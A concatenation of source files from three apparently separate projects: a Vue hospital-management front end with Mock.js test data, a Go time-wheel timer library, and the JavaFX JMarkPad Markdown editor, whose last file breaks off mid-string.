name:'treatment',
component:Treatment
},
{
path:'examination1',
name:'examination1',
component:ExaminationFirst
},
{
path:'examination2',
name:'examination2',
component:ExaminationSecond
},
{
path:'treatmentOver',
name:'treatmentOver',
component:TreatmentOver
},
{
path:'expenseSearch',
name:'expenseSearch',
component:ExpenseSearch
}
]
}
<|start_filename|>src/nav/pharmacy.js<|end_filename|>
export default [
{
name: '药房工作站',
url: '/pharmacy',
},
]
<|start_filename|>src/nav/doctor.js<|end_filename|>
export default [
{
name: '病历首页',
url: '/doctor/homepage',
},
{
name:'检查申请',
url:'/doctor/examination1',
},
{
name:'检验申请',
url:'/doctor/examination2',
},
{
name:'门诊确诊',
url:'/doctor/finalDiagnosis',
},
{
name:'成药处方',
url:'/doctor/patentPrescription',
},
{
name:'草药处方',
url:'/doctor/herbalPrescription',
},
{
name:'处置申请',
url:'/doctor/treatment',
},
{
name:'费用查询',
url:'/doctor/expenseSearch',
},
{
name:'诊毕',
url:'/doctor/treatmentOver',
},
]
<|start_filename|>src/mock/common.js<|end_filename|>
import Mock from 'mockjs'
import userType from '../config/userType'
export default function () {
const Random = Mock.Random;
Mock.mock('/api/data', () => {// When a POST or GET request hits the /api/data route, Mock intercepts it and returns the mocked data below
let list = [];
for(let i = 0; i < 30; i++) {
let listObject = {
title: Random.csentence(5, 10), // randomly generates a short Chinese sentence
company: Random.csentence(5, 10),
attention_degree: Random.integer(100, 9999), // returns a random integer
photo: Random.image('114x83', '#00405d', '#FFF', 'Mock.js')
};
list.push(listObject);
}
return {
data: list
};
});
Mock.mock('/api/login',(data)=>{
let param = JSON.parse(data.body);
return{
'code': true,
'user_type':userType.indexOf(param.username)
}
});
}
<|start_filename|>src/router/pharmacy.js<|end_filename|>
// Containers
const DefaultContainer = () => import('../containers/DefaultContainer');
//Pharmacy
// const PharmacyHome = () => import('../views/pharmacy/pharmacy');
const pharmacy = () => import("../views/pharmacy/pharmacy");
export default {
path:'/pharmacy',
redirect:'/pharmacy/pharmacy',
name:'pharmacy',
component: DefaultContainer,
children: [
{
path: '/pharmacy/pharmacy',
name: 'pharmacyHome',
component: pharmacy
}
]
}
<|start_filename|>src/mock/doctor.js<|end_filename|>
import Mock from "mockjs";
export default function () {
const Random = Mock.Random;
Mock.mock(RegExp('/api/getPatientList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 100; i++) {
let listObject = {
medical_record_id: Random.integer(2019062000, 2019062100),
patient_name: Random.cword(2, 3),
pay_way: Random.cword(2, 4),
diagnosis_status: Random.pick(['待診','已却診','已初诊','诊毕']),
patient_sex:Random.pick(['男','女']),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
Mock.mock(RegExp('/api/getMedicalRecordTemplateList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 100; i++) {
let listObject = {
medical_record_template_id: Random.integer(1, 100),
medical_record_template_name: Random.cword(4, 5),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
Mock.mock(RegExp('/api/getDiagnosisList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 3; i++) {
let listObject = {
disease_id:Random.integer(1, 100),
disease_name:Random.cword(4, 5),
main_diagnosis_mark:Random.pick(['1','2']),
suspect_mark:Random.pick(['1','2']),
onset_date:Random.pick(['2019-10-10','2019-10-11']),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
Mock.mock(RegExp('/api/countChineseDiseaseList' + ".*"), "get", {
code:true,
total:100
});
Mock.mock(RegExp('/api/getChineseDiseaseList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 100; i++) {
let listObject = {
diseaseId:Random.integer(10120, 100012),
diseaseIcd:Random.pick('CDS152', 'CDS154'),
diseaseName:Random.cword(4, 5) ,
diseaseCode:Random.cword(4, 5) ,
diseaseTypeId:Random.integer(1, 100),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
Mock.mock(RegExp('/api/countWesternDiseaseList' + ".*"), "get", {
code:true,
total:100
});
Mock.mock(RegExp('/api/getWesternDiseaseList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 100; i++) {
let listObject = {
diseaseId:Random.integer(10120, 100012),
diseaseIcd:Random.pick('WES152', 'WES154'),
diseaseName:Random.cword(4, 5) ,
diseaseCode:Random.cword(4, 5) ,
diseaseTypeId:Random.integer(1, 100),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
}
<|start_filename|>src/nav/patient.js<|end_filename|>
export default [
{
name: '自助查询',
url: '/patient/homePage'
},
{
name: '自助挂号',
url: '/patient/register'
},
]
<|start_filename|>src/router/basicInfo.js<|end_filename|>
//Default container component
import DefaultContainer from "../containers/DefaultContainer";
//Department info component
import DepartmentInfo from "../views/basicInfo/departmentInfo"
//User info component
import UserInfo from "../views/basicInfo/userInfo"
//Registration level info component
import RegistrationLevelInfo from "../views/basicInfo/registrationLevelInfo"
//Settlement category info component
import CalculationTypeInfo from "../views/basicInfo/calculationTypeInfo"
//Diagnosis catalog info component
import DiseaseInfo from "../views/basicInfo/diseaseInfo"
//Non-drug charge item info component
import FmedicalItemsInfo from "../views/basicInfo/fmedicalItemsInfo"
//Scheduling info component
import SchedulingInfo from "../views/basicInfo/schedulingInfo"
//Expense category info component
import ExpenseTypeInfo from "../views/basicInfo/expenseTypeInfo"
//Drug info component
import DrugsInfo from "../views/basicInfo/drugsInfo"
export default {
path: '/basicInfo',
name: 'basicInfo',
redirect:'/basicInfo/departmentInfo',
component: DefaultContainer,
children: [
{
path: 'departmentInfo',
name: 'departmentInfo',
component: DepartmentInfo
},
{
path: 'userInfo',
name: 'userInfo',
component: UserInfo
},
{
path: 'registrationLevelInfo',
name: 'registrationLevelInfo',
component: RegistrationLevelInfo
},
{
path: 'calculationTypeInfo',
name: 'calculationTypeInfo',
component: CalculationTypeInfo
},
{
path: 'diseaseInfo',
name: 'diseaseInfo',
component: DiseaseInfo
},
{
path: 'fmedicalItemsInfo',
name: 'fmedicalItemsInfo',
component: FmedicalItemsInfo
},
{
path: 'schedulingInfo',
name: 'schedulingInfo',
component: SchedulingInfo
},
{
path: 'expenseTypeInfo',
name: 'expenseTypeInfo',
component: ExpenseTypeInfo
},
{
path: 'drugsInfo',
name: 'drugsInfo',
component: DrugsInfo
},
]
}
<|start_filename|>src/nav/basicInfo.js<|end_filename|>
export default [
{
name: '科室管理',
url: '/basicInfo/departmentInfo'
},
{
name: '用户管理',
url: '/basicInfo/userInfo'
},
{
name: '挂号级别管理',
url: '/basicInfo/registrationLevelInfo'
},
{
name: '结算类别管理',
url: '/basicInfo/calculationTypeInfo'
},
{
name: '诊断目录管理',
url: '/basicInfo/diseaseInfo'
},{
name: '非药品收费项目管理',
url: '/basicInfo/fmedicalItemsInfo'
}
,{
name: '医生排班管理',
url: '/basicInfo/schedulingInfo'
},
{
name: '费用科目管理',
url: '/basicInfo/expenseTypeInfo'
},
{
name: '药品管理',
url: '/basicInfo/drugsInfo'
},
]
<|start_filename|>src/nav/register.js<|end_filename|>
export default [
{
name: '挂号首页',
url: '/register/registerHome'
},
{
name: '收费首页',
url: '/register/chargeHome'
},
{
name: '患者费用查询',
url: '/register/chargeHome'
},
]
<|start_filename|>src/router/patient.js<|end_filename|>
// Containers
const DefaultContainer = () => import('../containers/DefaultContainer');
const HomePage = () => import('../views/patient/homePage');
const Register = () => import('../views/patient/register');
export default {
path:'/patient',
// redirect:'/',
name:'Patient',
component: DefaultContainer,
children: [
{
path: 'homePage',
name: 'homePage',
component: HomePage
},
{
path: 'register',
name: 'register',
component: Register
},
]
}
<|start_filename|>src/store/register.js<|end_filename|>
export default {
namespaced:true,
state:{
cashier: {
userId: 1,
}
},
mutations: {
updateCashier(state, newUserId){
state.cashier.userId = newUserId;
},
},
}
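// Usage sketch: assumes this module is registered under the "register" namespace
// in the root store (the root store file is not shown here):
//   this.$store.commit('register/updateCashier', 42); // sets state.cashier.userId to 42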
<|start_filename|>src/config/axios.js<|end_filename|>
import {
baseUrl, // import baseUrl
} from "../config/env";
import axios from 'axios';
axios.defaults.timeout = 10000; // request timeout (ms)
axios.defaults.baseURL = baseUrl; // default API base URL
axios.defaults.headers.post['Content-Type'] = 'application/json'; // send JSON in POST requests
// axios.defaults.withCredentials = true;
// axios.defaults.headers.post['Content-Type']='application/x-www-form-urlencoded';
/**
* Wrapper around axios GET requests
* @param url
* @param params
* @returns {Promise}
*/
export function fetch(url,params={}){
return new Promise((resolve,reject) => {
axios.get(url,{
params:params
})
.then(response => {
resolve(response.data);
})
.catch(err => {
reject(err)
})
})
}
/**
* Wrapper around axios POST requests
* @param url
* @param data
* @returns {Promise}
*/
export function post(url,data = {}){
return new Promise((resolve,reject) => {
axios.post(url,data)
.then(response => {
resolve(response.data);
},err => {
reject(err)
})
})
}
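// Usage sketch for the wrappers above. The endpoint and parameter names are
// illustrative; they are defined by the mock/API layer, not by this file:
//   fetch('/api/getPatientList', { page: 1 })
//     .then(data => console.log(data))
//     .catch(err => console.error(err));
//   post('/api/login', { username: 'doctor', password: '123456' })
//     .then(data => console.log(data));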
<|start_filename|>src/config/config.local.js<|end_filename|>
module.exports = {
developUrl:"http://localhost:8080/hoso/"
};
<|start_filename|>src/config/userType.js<|end_filename|>
export default ["home", "doctor", "statistics", "basicInfo", "register", "pharmacy", "tech"]
<|start_filename|>src/store/pharmacy.js<|end_filename|>
export default {
namespaced:true,
state:{
curr_user:{}
},
}
<|start_filename|>vue.config.js<|end_filename|>
module.exports = {
lintOnSave: false,
runtimeCompiler: true,
devServer:{
port: 8000,
// proxy:{
// '/sm':{
// target:'https://sm.ms/api',
// changeOrigin: true,
// pathRewrite: {
// '^/sm':''
// }
// }
// }
},
};
<|start_filename|>src/router/register.js<|end_filename|>
//Default container component
import DefaultContainer from "../containers/DefaultContainer";
//Registration home component
import RegisterHome from "../views/register/registerHome";
//Charge home component
import ChargeHome from "../views/register/chargeHome";
export default {
path: '/register',
name: 'register',
redirect:'/register/registerHome',
component: DefaultContainer,
children: [
{
path: 'registerHome',
name: 'registerHome',
component: RegisterHome
},
{
path: 'chargeHome',
name: 'chargeHome',
component: ChargeHome
},
]
}
<|start_filename|>src/mock/index.js<|end_filename|>
import common from './common'
import doctor from "./doctor";
import register from './register'
import basicInfo from "./basicInfo";
import tech from "./tech"
import pharmacy from "./pharmacy";
export default function () {
common();
doctor();
register();
basicInfo();
tech();
pharmacy();
}
<|start_filename|>src/config/env.js<|end_filename|>
// import localConfig from "./config.local"
let baseUrl = '';
if (process.env.NODE_ENV === 'development') {
const localConfig = require("./config.local");
baseUrl = localConfig.developUrl
} else if (process.env.NODE_ENV === 'production') {
baseUrl = 'http://172.16.31.10:8080/hoso';
}
export {
baseUrl, // export baseUrl
}
| hosoneu/his_Vue |
<|start_filename|>tw.go<|end_filename|>
package goTimeWheel
import (
"container/list"
"time"
)
// TimeWheel Struct
type TimeWheel struct {
interval time.Duration // ticker run interval
ticker *time.Ticker
slots []*list.List
keyPosMap map[interface{}]int // keep each timer's position
slotNum int
currPos int // timewheel current position
addChannel chan Task // channel to add Task
removeChannel chan interface{} // channel to remove Task
stopChannel chan bool // stop signal
}
// Task Struct
type Task struct {
key interface{} // Timer Task ID
delay time.Duration // Run after delay
circle int // when circle equal 0 will trigger
fn func(interface{}) // custom function
params interface{} // custom params
}
// New Func: Generate TimeWheel with ticker and slotNum
func New(interval time.Duration, slotNum int) *TimeWheel {
if interval <= 0 || slotNum <= 0 {
return nil
}
tw := &TimeWheel{
interval: interval,
slots: make([]*list.List, slotNum),
keyPosMap: make(map[interface{}]int),
currPos: 0,
slotNum: slotNum,
addChannel: make(chan Task),
removeChannel: make(chan interface{}),
stopChannel: make(chan bool),
}
for i := 0; i < slotNum; i++ {
tw.slots[i] = list.New()
}
return tw
}
// Start Func: start ticker and monitor channel
func (tw *TimeWheel) Start() {
tw.ticker = time.NewTicker(tw.interval)
go tw.start()
}
func (tw *TimeWheel) start() {
for {
select {
case <-tw.ticker.C:
tw.handle()
case task := <-tw.addChannel:
tw.addTask(&task)
case key := <-tw.removeChannel:
tw.removeTask(key)
case <-tw.stopChannel:
tw.ticker.Stop()
return
}
}
}
func (tw *TimeWheel) Stop() {
tw.stopChannel <- true
}
func (tw *TimeWheel) AddTimer(delay time.Duration, key interface{}, fn func(interface{}), params interface{}) {
if delay < 0 {
return
}
tw.addChannel <- Task{delay: delay, key: key, fn: fn, params: params}
}
func (tw *TimeWheel) RemoveTimer(key interface{}) {
if key == nil {
return
}
tw.removeChannel <- key
}
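// Usage sketch for the API above; the caller's imports (time, fmt) and the
// import path are assumed, not shown in this file:
//
//	tw := goTimeWheel.New(time.Second, 60) // 60 slots, ticking once per second
//	tw.Start()
//	tw.AddTimer(5*time.Second, "task1", func(p interface{}) {
//		fmt.Println("fired:", p) // runs roughly 5 seconds after AddTimer
//	}, "hello")
//	tw.RemoveTimer("task1") // cancels the timer if it has not fired yet
//	tw.Stop()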
// handle Func: Do currPosition slots Task
func (tw *TimeWheel) handle() {
l := tw.slots[tw.currPos]
for e := l.Front(); e != nil; {
curElement := e
task := e.Value.(*Task)
next := e.Next()
e = next
if task.circle > 0 {
task.circle--
continue
}
go task.fn(task.params)
l.Remove(curElement)
if task.key != nil {
delete(tw.keyPosMap, task.key)
}
}
tw.currPos = (tw.currPos + 1) % tw.slotNum
}
// getPosAndCircle Func: parse duration by interval to get circle and position
func (tw *TimeWheel) getPosAndCircle(d time.Duration) (pos int, circle int) {
circle = int(d.Seconds()) / int(tw.interval.Seconds()) / tw.slotNum
pos = (tw.currPos + int(d.Seconds())/int(tw.interval.Seconds())) % tw.slotNum
return
}
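// Worked example for getPosAndCircle, assuming interval=1s, slotNum=60, currPos=10:
// a task delayed by 75s advances 75 ticks, so circle = 75/60 = 1 (wait one full
// revolution) and pos = (10+75)%60 = 25 (the slot it is parked in).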
func (tw *TimeWheel) addTask(task *Task) {
pos, circle := tw.getPosAndCircle(task.delay)
task.circle = circle
tw.slots[pos].PushBack(task)
if task.key != nil {
tw.keyPosMap[task.key] = pos
}
}
func (tw *TimeWheel) removeTask(key interface{}) {
pos, ok := tw.keyPosMap[key]
if !ok {
return
}
l := tw.slots[pos]
// Capture the next element before a possible Remove so iteration can continue safely.
for e := l.Front(); e != nil; {
next := e.Next()
task := e.Value.(*Task)
if task.key == key {
delete(tw.keyPosMap, task.key)
l.Remove(e)
}
e = next
}
}
}
| zheng-ji/goTimeWheel |
<|start_filename|>src/main/resources/css/JMarkPad.css<|end_filename|>
.jfx-decorator .jfx-decorator-buttons-container {
-fx-background-color: -fx-decorator-color;
}
.jfx-decorator .resize-border {
-fx-border-color: -fx-decorator-color;
-fx-border-width: 0 4 4 4;
}
.jfx-tab-pane .tab-header-background {
-fx-background-color: tab-header-background;
}
.tab-button {
-fx-text-fill: WHITE;
}
.tab-button:hover {
-fx-background-color: -fx-decorator-color;
}
.custom-jfx-button-raised {
-fx-padding: 0.7em 0.57em;
-fx-font-size: 14.0px;
-jfx-button-type: RAISED;
-fx-pref-width: 100.0;
-fx-background-color: -fx-decorator-color;
-fx-text-fill: WHITE;
}
<|start_filename|>src/main/java/utilities/Utilities.java<|end_filename|>
package utilities;
import com.vladsch.flexmark.util.ast.Node;
import com.vladsch.flexmark.html.HtmlRenderer;
import com.vladsch.flexmark.parser.Parser;
import com.vladsch.flexmark.util.data.MutableDataSet;
import javafx.scene.paint.Color;
public class Utilities {
private static Parser parser;
private static HtmlRenderer renderer;
static {
MutableDataSet options = new MutableDataSet();
parser = Parser.builder(options).build();
renderer = HtmlRenderer.builder(options).build();
}
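/**
 * Converts Markdown text to HTML using flexmark. Single newlines in the input are
 * doubled first, so a line break in the editor behaves like a paragraph break in
 * the rendered preview.
 */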
public static String reparse(String text) {
Node document = parser.parse(text.replace("\n", "\n\n"));
return renderer.render(document);
}
}
<|start_filename|>src/main/java/ui/Main.java<|end_filename|>
package ui;
public class Main{
public static void main(String[] args) {
javafx.application.Application.launch(UI.class);
}
}
<|start_filename|>src/main/java/ui/panes/OptionsPane.java<|end_filename|>
package ui.panes;
import com.jfoenix.controls.JFXButton;
import javafx.fxml.FXML;
import javafx.fxml.FXMLLoader;
import javafx.scene.Parent;
import javafx.scene.layout.Region;
import javafx.scene.layout.StackPane;
import javafx.scene.paint.Color;
import javafx.scene.control.ColorPicker;
import ui.UI;
import java.io.IOException;
public class OptionsPane extends StackPane {
@FXML
private ColorPicker colorPicker;
@FXML
private JFXButton backButton;
public OptionsPane(UI ui) {
try {
FXMLLoader fxmlLoader = new FXMLLoader(getClass().getResource("/fxml/panes/OptionsPane.fxml"));
fxmlLoader.setController(this);
Parent root = (Region) fxmlLoader.load();
getStylesheets().add("/css/JMarkPad.css");
addListeners(ui);
colorPicker.setValue(Color.web(ui.primaryColor));
getChildren().add(root);
} catch (IOException e) {
e.printStackTrace();
}
}
private void addListeners(UI ui) {
colorPicker.setOnAction(t -> {
Color color = colorPicker.getValue();
ui.primaryColor = String.valueOf(color).replace("0x", "#");
ui.secondaryColor = String.valueOf(color.brighter().brighter()).replace("0x", "#");
ui.refreshTheme();
});
backButton.setOnAction(e -> {
ui.drawersStack.setMouseTransparent(true);
ui.drawersStack.toggle(ui.optionsDrawer);
});
}
}
<|start_filename|>src/main/java/ui/JMPTab.java<|end_filename|>
package ui;
import com.jfoenix.controls.*;
import com.jfoenix.svg.SVGGlyph;
import javafx.scene.Cursor;
import javafx.scene.control.SplitPane;
import javafx.scene.control.Tab;
import javafx.scene.layout.StackPane;
import javafx.scene.paint.Color;
import javafx.scene.text.Text;
import javafx.scene.web.WebView;
import javafx.stage.FileChooser;
import javafx.stage.Stage;
import utilities.Utilities;
import utilities.HyperLinkRedirectListener;
import java.io.*;
import java.util.Properties;
public class JMPTab extends Tab {
private JFXButton btnClose;
private SplitPane splitPane;
private JFXTextArea textArea;
private WebView webView;
private String filePath = "";
boolean isSaved = true;
JMPTab(String name, JFXTabPane tabPane) {
super(name);
splitPane = new SplitPane();
setTextArea(new JFXTextArea());
setWebView(new WebView());
setOnCloseRequest(e -> checkIfUserWantsToSaveFile());
createTabButton();
setContent(splitPane);
setGraphic(btnClose);
((JFXButton) getGraphic()).setOnAction(e -> {
if (!isSaved) {
checkIfUserWantsToSaveFile();
}
tabPane.getTabs().remove(this);
});
webView.getEngine().getLoadWorker().stateProperty().addListener(new HyperLinkRedirectListener(webView));
}
private void createTabButton() {
SVGGlyph close = new SVGGlyph(0,
"CLOSE",
"M810 274l-238 238 238 238-60 60-238-238-238 238-60-60 238-238-238-238 60-60 238 238 238-238z",
Color.WHITE);
close.setSize(12, 12);
this.btnClose = new JFXButton();
this.btnClose.getStyleClass().add("tab-button");
this.btnClose.setCursor(Cursor.HAND);
this.btnClose.setGraphic(close);
}
void checkIfUserWantsToSaveFile() {
if (!isSaved) {
JFXDialogLayout dialogLayout = new JFXDialogLayout();
String title = "Saving...";
dialogLayout.setHeading(new Text(title));
String body = "Save file \"" + getText().replace(" (*)", "") + "\" ?";
dialogLayout.setBody(new Text(body));
JFXButton btnYes = new JFXButton("YES");
JFXButton btnNo = new JFXButton("NO");
btnYes.setCursor(Cursor.HAND);
btnNo.setCursor(Cursor.HAND);
btnYes.getStyleClass().add("custom-jfx-button-raised");
btnYes.setStyle("-fx-background-color: #4caf50");
btnNo.getStyleClass().add("custom-jfx-button-raised");
btnNo.setStyle("-fx-background-color: #f44336");
dialogLayout.setActions(btnYes, btnNo);
JFXDialog dialog = new JFXDialog((StackPane) getTabPane().getParent(), dialogLayout, JFXDialog.DialogTransition.TOP, false);
btnYes.setOnAction(e -> {
checkSaveInCurrentPath();
dialog.close();
});
btnNo.setOnAction(e -> dialog.close());
dialog.show();
}
}
void checkSaveInCurrentPath() {
File file = null;
if (filePath.isEmpty()) {
try {
FileChooser fc = new FileChooser();
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("All files (*.*)", "*.*"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("Markdown files (*.md)", "*.md"));
Properties properties = new Properties();
properties.load(new FileInputStream("jmarkpad.properties"));
String folderPath = properties.getProperty("folderPath");
if (folderPath != null) {
fc.setInitialDirectory(new File(folderPath));
}
file = fc.showSaveDialog(new Stage());
} catch (Exception e) {
e.printStackTrace();
}
} else {
file = new File(filePath);
}
save(file);
}
void saveAs() {
try {
FileChooser fc = new FileChooser();
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("All files (*.*)", "*.*"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("Markdown files (*.md)", "*.md"));
Properties properties = new Properties();
properties.load(new FileInputStream("jmarkpad.properties"));
String folderPath = properties.getProperty("folderPath");
if (folderPath != null && !folderPath.isEmpty()) {
fc.setInitialDirectory(new File(folderPath));
}
File file = fc.showSaveDialog(new Stage());
save(file);
folderPath = file.getParent();
properties.setProperty("folderPath", String.valueOf(file.getParent()));
properties.store(new FileOutputStream("jmarkpad.properties"), null);
} catch (Exception e) {
e.printStackTrace();
}
}
private void save(File file) {
if (file != null) {
try {
FileWriter fileWriter = new FileWriter(file);
fileWriter.write(getTextArea().getText());
fileWriter.close();
filePath = file.getAbsolutePath();
setSaved(true);
setText(file.getName());
} catch (IOException ex) {
ex.printStackTrace();
}
}
}
//Getters and setters
@SuppressWarnings("unused")
void setTextArea(JFXTextArea textArea) {
this.textArea = textArea;
textArea.textProperty().addListener(o -> {
webView.getEngine().loadContent(Utilities.reparse(textArea.getText()), "text/html");
setSaved(false);
});
if(this.webView != null)
{
this.webView.getEngine().loadContent(Utilities.reparse(textArea.getText()), "text/html");
}
if (splitPane.getItems().size() > 1) {
splitPane.getItems().remove(0);
}
splitPane.getItems().add(0, textArea);
setContent(splitPane);
}
@SuppressWarnings("unused")
private void setWebView(WebView webView) {
this.webView = webView;
if (splitPane.getItems().size() > 1) {
splitPane.getItems().remove(1);
}
splitPane.getItems().add(1, webView);
setContent(splitPane);
}
@SuppressWarnings("unused")
private JFXTextArea getTextArea() {
return textArea;
}
@SuppressWarnings("unused")
public WebView getWebView() {
return webView;
}
@SuppressWarnings("unused")
public void setSaved(boolean isSaved) {
this.isSaved = isSaved;
if (isSaved) {
setText(getText().replace(" (*)", ""));
} else {
setText(getText().replace(" (*)", "") + " (*)");
}
}
@SuppressWarnings("unused")
String getFilePath() {
return filePath;
}
@SuppressWarnings("unused")
void setFilePath(String filePath) {
this.filePath = filePath;
}
}
<|start_filename|>src/main/java/ui/UI.java<|end_filename|>
package ui;
import com.jfoenix.controls.*;
import com.jfoenix.controls.JFXDrawer.DrawerDirection;
import javafx.application.Application;
import javafx.beans.value.ChangeListener;
import javafx.beans.value.ObservableValue;
import javafx.event.ActionEvent;
import javafx.fxml.FXML;
import javafx.fxml.FXMLLoader;
import javafx.fxml.Initializable;
import javafx.scene.Cursor;
import javafx.scene.Parent;
import javafx.scene.Scene;
import javafx.scene.control.MenuBar;
import javafx.scene.control.Tab;
import javafx.scene.layout.FlowPane;
import javafx.scene.layout.Region;
import javafx.scene.layout.StackPane;
import javafx.scene.text.Text;
import javafx.stage.FileChooser;
import javafx.stage.Stage;
import javafx.stage.StageStyle;
import ui.panes.OptionsPane;
import java.io.*;
import java.net.URL;
import java.util.Properties;
import java.util.ResourceBundle;
public class UI extends Application implements Initializable {
private Stage stage;
@FXML
public StackPane stackPane;
@FXML
public JFXDrawersStack drawersStack;
@FXML
public JFXTabPane tabPane;
@FXML
public MenuBar menuBar;
private static String receivedPath = "";
public JFXDrawer optionsDrawer, aboutDrawer;
public String primaryColor;
public String secondaryColor;
private JMPDecorator decorator;
private String folderPath;
@Override
public void start(Stage stage) {
this.stage = stage;
try {
FXMLLoader fxmlLoader = new FXMLLoader(getClass().getResource("/fxml/JMarkPad.fxml"));
fxmlLoader.setController(this);
Parent root = (Region) fxmlLoader.load();
decorator = new JMPDecorator(stage, root);
decorator.setTitle("JMarkPad");
decorator.setBtnFullscreenVisible(false);
decorator.setCustomMaximize(true);
Scene scene = new Scene(decorator, 800, 600);
scene.getStylesheets().add("/css/JMarkPad.css");
stage.initStyle(StageStyle.UNDECORATED);
stage.setResizable(true);
stage.setMinWidth(800);
stage.setMinHeight(600);
stage.setScene(scene);
loadConfig();
loadDrawers();
if (!receivedPath.equals("")) {
JMPTab tab = new JMPTab(receivedPath.split("\\\\")[receivedPath.split("\\\\").length - 1],
tabPane);
try {
openFileIntoTab(new File(receivedPath), tab);
tab.setFilePath(receivedPath);
} catch (FileNotFoundException ignored) {
}
tabPane.getTabs().add(tab);
} else {
if (tabPane.getTabs().size() < 1) {
JMPTab tab = new JMPTab("New 1", tabPane);
tabPane.getTabs().add(tab);
}
}
refreshTheme();
stage.show();
} catch (Throwable t) {
t.printStackTrace();
}
}
private void loadConfig() {
try {
if (!new File("jmarkpad.properties").exists()) {
createPropertiesFile("", true);
}
Properties properties = new Properties();
properties.load(new FileInputStream("jmarkpad.properties"));
stage.setX(Double.valueOf(properties.getProperty("posX")));
stage.setY(Double.valueOf(properties.getProperty("posY")));
stage.setWidth(Double.valueOf(properties.getProperty("width")));
stage.setHeight(Double.valueOf(properties.getProperty("height")));
primaryColor = String.valueOf(properties.getProperty("primaryColor"));
secondaryColor = String.valueOf(properties.getProperty("secondaryColor"));
folderPath = properties.getProperty("folderPath");
String pathFiles = properties.getProperty("filePaths");
for (String path : pathFiles.split(";")) {
if (path.length() > 1) {
JMPTab tab = new JMPTab(new File(path).getName(), tabPane);
File file = new File(path);
openFileIntoTab(file, tab);
tab.setFilePath(file.getAbsolutePath());
tabPane.getTabs().add(tab);
tabPane.getSelectionModel().select(tab);
}
}
} catch (Exception e) {
e.printStackTrace();
}
}
private void loadDrawers() {
drawersStack.setMouseTransparent(true);
FlowPane content = new FlowPane();
StackPane optionsDrawerPane = new StackPane();
optionsDrawer = new JFXDrawer();
OptionsPane optionsPane = new OptionsPane(this);
optionsDrawerPane.getChildren().add(optionsPane);
optionsDrawer.setDirection(DrawerDirection.RIGHT);
optionsDrawer.setSidePane(optionsDrawerPane);
optionsDrawer.setDefaultDrawerSize(150);
optionsDrawer.setOverLayVisible(false);
optionsDrawer.setResizableOnDrag(true);
drawersStack.setContent(content);
}
@Override
public void initialize(URL location, ResourceBundle resources) {
}
@FXML
public void newClicked(ActionEvent ae) {
String newFileName = "";
int counter = 1;
boolean usedName;
while (newFileName.equals("")) {
usedName = false;
for (int i = 0; i < tabPane.getTabs().size(); i++) {
if (tabPane.getTabs().get(i).getText().contains("New " + counter)) {
usedName = true;
i = tabPane.getTabs().size();
}
}
if (!usedName) {
newFileName = "New " + counter;
}
counter++;
}
JMPTab tab = new JMPTab(newFileName, tabPane);
tabPane.getTabs().add(tab);
tabPane.getSelectionModel().select(tab);
}
@FXML
public void openClicked(ActionEvent ae) {
try {
FileChooser fc = new FileChooser();
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("All files (*.*)", "*.*"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("TXT files (*.txt)", "*.txt"));
fc.getExtensionFilters().add(new FileChooser.ExtensionFilter("Markdown files (*.md)", "*.md"));
Properties properties = new Properties();
properties.load(new FileInputStream("jmarkpad.properties"));
String folderPath = properties.getProperty("folderPath");
if (folderPath != null && !folderPath.isEmpty()) {
fc.setInitialDirectory(new File(folderPath));
}
File file = fc.showOpenDialog(stage);
if (file != null) {
folderPath = file.getParent();
if (!fileIsAlreadyOpened(file.getAbsolutePath())) {
JMPTab tab = new JMPTab(file.getName(), tabPane);
openFileIntoTab(file, tab);
tab.setFilePath(file.getAbsolutePath());
tabPane.getTabs().add(tab);
tabPane.getSelectionModel().select(tab);
properties.setProperty("folderPath", String.valueOf(folderPath));
properties.store(new FileOutputStream("jmarkpad.properties"), null);
}
}
} catch (Exception e) {
e.printStackTrace();
}
}
@FXML
public void saveClicked(ActionEvent ae) {
((JMPTab) tabPane.getTabs().get(tabPane.getSelectionModel().getSelectedIndex())).checkSaveInCurrentPath();
}
@FXML
public void saveAllClicked(ActionEvent ae) {
for (int i = 0; i < tabPane.getTabs().size(); i++) {
((JMPTab) tabPane.getTabs().get(i)).checkSaveInCurrentPath();
}
}
@FXML
public void saveAsClicked(ActionEvent ae) {
for (int i = 0; i < tabPane.getTabs().size(); i++) {
((JMPTab) tabPane.getTabs().get(i)).saveAs();
}
}
@FXML
public void closeClicked(ActionEvent ae) {
if (!((JMPTab) tabPane.getTabs().get(tabPane.getSelectionModel().getSelectedIndex())).isSaved) {
((JMPTab) tabPane.getTabs().get(tabPane.getSelectionModel().getSelectedIndex())).checkIfUserWantsToSaveFile();
}
tabPane.getTabs().remove(tabPane.getSelectionModel().getSelectedIndex());
}
@FXML
public void optionsClicked(ActionEvent ae) {
drawersStack.toggle(optionsDrawer);
drawersStack.setMouseTransparent(false);
}
@FXML
public void markDownHelpClicked(ActionEvent ae) {
JMPTab examplesTab = new JMPTab("Markdown Help", tabPane);
JFXTextArea textArea = new JFXTextArea();
examplesTab.setTextArea(textArea);
tabPane.getTabs().add(examplesTab);
tabPane.getSelectionModel().select(examplesTab);
textArea.setText("# Title 1\n\n" +
"## Title 2\n\n" +
"### Title 3\n\n" +
"[link](https://github.com/mayuso/JMarkPad)\n\n" +
"List:\n" +
"* item 1\n" +
"* item 2\n" +
"* item 3\n\n" +
"**bold**\n\n" +
"*italics*\n\n");
examplesTab.setSaved(true);
}
@FXML
public void aboutClicked(ActionEvent ae) {
JFXDialogLayout dialogLayout = new JFXDialogLayout();
String title = "JMarkPad";
dialogLayout.setHeading(new Text(title));
String body = "Why?\n" +
"I created JMarkPad as a tool to experiment with JavaFX.\n" +
